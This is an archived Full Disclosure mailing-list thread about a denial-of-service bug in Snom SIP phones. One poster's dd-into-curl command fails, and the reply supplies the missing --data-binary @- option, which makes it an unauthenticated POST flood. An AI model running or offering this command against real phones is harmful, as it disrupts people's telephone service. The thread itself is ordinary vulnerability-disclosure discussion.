Re: [FD] Snom SIP phones denial of service through HTTP

2015-01-13 Thread kape...@googlemail.com
The latest version is 8.7.3.25.9, there is no 8.7.4.X, yet.

And yes, you missed something, (without the quotes)   --data-binary @-
This turns it into a HTTP POST request and uses the input from stdin.
Otherwise you just do a regular HTTP GET which gets blocked because it's
not authenticated.


On Mon, Jan 12, 2015 at 10:20 PM, Martin Schuhmacher broetche...@gmx.net
wrote:

 Hi

 i just did

 $ dd if=/dev/zero bs=1M count=32 | curl http://$IP/
 Response: Unauthorized request

 did i miss anything?

 Firmware: snom360-SIP 8.7.4.8
 not downloadable any more for some reason?

 Yours
 Martin

 ___
 Sent through the Full Disclosure mailing list
 http://nmap.org/mailman/listinfo/fulldisclosure
 Web Archives  RSS: http://seclists.org/fulldisclosure/


___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


Re: [FD] Snom SIP phones denial of service through HTTP

2015-01-12 Thread Martin Schuhmacher
Hi

i just did 

$ dd if=/dev/zero bs=1M count=32 | curl http://$IP/
Response: Unauthorized request

did i miss anything?

Firmware: snom360-SIP 8.7.4.8
not downloadable any more for some reason?

Yours
Martin

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/